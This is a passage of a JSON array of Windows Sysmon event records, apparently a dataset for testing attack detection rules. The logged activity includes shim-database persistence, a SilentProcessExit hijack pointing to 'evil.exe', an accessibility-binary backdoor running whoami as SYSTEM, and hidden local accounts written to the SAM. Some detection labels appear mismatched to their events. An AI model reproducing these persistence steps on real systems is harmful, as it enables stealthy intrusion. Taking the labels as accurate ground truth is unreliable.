Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-5689-5C91-0000-0010543F0800","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:25.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966429,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:25.933892Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-568A-5C91-0000-0010D24B0800","ProcessId":4072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:26.194"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966444,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:26.364512Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-001012610800","ProcessId":2548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:47.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966449,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.124363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-0010D96C0800","ProcessId":3140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:52:47.364"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966464,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.474867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Users\\user01\\Desktop\\titi.sdb\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\user01\\Desktop\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-57EC-5C91-0000-001097810900","ProcessId":2848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:58:20.894"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966480,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:20.994444Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-528D-5C91-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"c:\\osk.exe\" ","ParentImage":"C:\\osk.exe","ParentProcessGuid":"365ABB72-57FB-5C91-0000-00104FD40900","ParentProcessId":2128,"ProcessGuid":"365ABB72-5804-5C91-0000-001044DE0900","ProcessId":2456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-03-19 
20:58:44.187"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966501,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:44.237867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966533,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966534,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 
21:20:35.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966535,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:35.603518Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"%%ProgramFiles%%\\Windows NT\\Accessories\\WORDPAD.EXE\" \"%%1\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106_CLASSES\\sdb_auto_file\\shell\\open\\command\\(Default)","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966543,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"WORDPAD.EXE","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sdb\\OpenWithList\\a","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966544,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-777F-5C91-0000-0010B95B0000","ProcessId":524,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 23:13:04.090"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966594,"Execution_attributes":{"ProcessID":988,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:18:50.627750Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local 
Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 09:28:22.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134365,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T09:28:22.280355Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 
10:03:04.489"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134385,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:03:04.489480Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\sqlsvc\\(Default)","UtcTime":"2020-09-04 10:33:31.842"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134399,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:33:31.843489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or 
Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:54:22.973"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134408,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:54:22.974353Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 11:00:24.601"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134411,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T11:00:24.602530Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000200)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F5D-5D0A-0000-00109B331300","ProcessId":1356,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag","UtcTime":"2019-06-19 17:22:41.709"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8034,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:41.709638Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F61-5D0A-0000-0010DB351300","ProcessId":2504,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\ReportingMode","UtcTime":"2019-06-19 17:22:43.912"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8036,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:43.944013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence 
Mechanisms"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\temp\\evil.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F63-5D0A-0000-0010F93A1300","ProcessId":1956,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\MonitorProcess","UtcTime":"2019-06-19 17:22:45.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8038,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:45.694013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Event Consumer Created Named Pipe","WMI Persistence - Script Event Consumer File Write","WMI Persistence - Script Event Consumer"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\scrcons.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Standard Event Consumer - scripting","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=6AEC20B9D4C1AB6F1AB297F28EB6BF93,IMPHASH=CCEC86CC0D16062391CC627BC9466A62","Image":"C:\\Windows\\System32\\wbem\\scrcons.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-701F-5CA5-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-7020-5CA5-0000-0010ED6A0000","ParentProcessId":596,"ProcessGuid":"365ABB72-F76F-5CA4-0000-0010AA201700","ProcessId":2636,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-03 18:11:59.996"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":7203,"Execution_attributes":{"ProcessID":1828,"ThreadID":372},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-03T18:12:00.016862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\StartupNewHomeAddress","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-BFB2-5CED-0000-0010F2C03600","ProcessId":1520,"RuleName":"Persistence - Startup User Shell Folder Modified","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\startup","UtcTime":"2019-05-28 23:09:38.589"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6625,"Execution_attributes":{"ProcessID":2032,"ThreadID":2420},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-28T23:09:38.589832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Usage of Sysinternals Tools","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD 
(0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\PsExec64.exe","ProcessGuid":"747F3D96-53D8-5D75-0000-00101811CD00","ProcessId":6868,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Sysinternals\\PsExec\\EulaAccepted","UtcTime":"2019-09-08 